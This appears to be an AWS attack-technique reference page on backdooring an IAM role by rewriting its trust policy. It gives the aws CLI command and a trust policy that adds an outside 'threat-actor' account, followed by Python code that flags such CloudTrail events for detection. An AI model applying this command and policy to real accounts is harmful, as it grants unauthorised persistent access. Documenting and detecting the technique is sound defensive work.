Backdoor an IAM Role

AWS persistence technique

Overview

IAM Roles have Trust Policies which dictate who or what (user/role/service) can assume the Role and gain access to its credentials and permissions. With permission to update that policy (iam:UpdateAssumeRolePolicy), a threat actor can modify the role's trust policy and gain access to it.

aws iam update-assume-role-policy --role-name Engineering --policy-document file://attacker-trust-policy.json

attacker-trust-policy.json:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": [
                    "arn:aws:iam::111111111111:user/legitimate-user",
                    "arn:aws:iam::222222222222:user/threat-actor"
                ]
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
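
For detection, the following added example (not part of the original page) reviews CloudTrail `UpdateAssumeRolePolicy` events and reports any principal outside an allow-list of account IDs. The `TRUSTED_ACCOUNTS` set, the function names and the sample event are assumptions constructed for illustration; the event layout assumes CloudTrail's `requestParameters.policyDocument` JSON string.

```python
import json
import re

TRUSTED_ACCOUNTS = {"111111111111"}  # assumption: account IDs your organization owns
ARN_ACCOUNT = re.compile(r"^arn:aws[\w-]*:(?:iam|sts)::(\d{12}):")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def untrusted_principals(policy, trusted=TRUSTED_ACCOUNTS):
    """Return AWS principals in Allow statements that fall outside `trusted`."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        principal = stmt.get("Principal", {})
        if stmt.get("Effect") != "Allow":
            continue
        if principal == "*":  # anyone may assume the role
            findings.append("*")
            continue
        for p in _as_list(principal.get("AWS", [])):
            m = ARN_ACCOUNT.match(p)
            account = m.group(1) if m else p  # bare account ID, "*", or unique ID
            if account not in trusted:
                findings.append(p)
    return findings

def review_event(event, trusted=TRUSTED_ACCOUNTS):
    """Flag a trust-policy update that grants access to an outside principal."""
    key = (event.get("eventSource"), event.get("eventName"))
    if key != ("iam.amazonaws.com", "UpdateAssumeRolePolicy"):
        return None
    params = event.get("requestParameters") or {}
    policy = json.loads(params.get("policyDocument") or "{}")
    bad = untrusted_principals(policy, trusted)
    return {"role": params.get("roleName"), "untrusted": bad} if bad else None

# Constructed sample event carrying the trust policy shown above.
SAMPLE_EVENT = {
    "eventSource": "iam.amazonaws.com",
    "eventName": "UpdateAssumeRolePolicy",
    "requestParameters": {"roleName": "Engineering", "policyDocument": json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "sts:AssumeRole", "Principal": {
            "AWS": ["arn:aws:iam::111111111111:user/legitimate-user",
                    "arn:aws:iam::222222222222:user/threat-actor"]}}]})},
}

if __name__ == "__main__":
    print(review_event(SAMPLE_EVENT))
```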
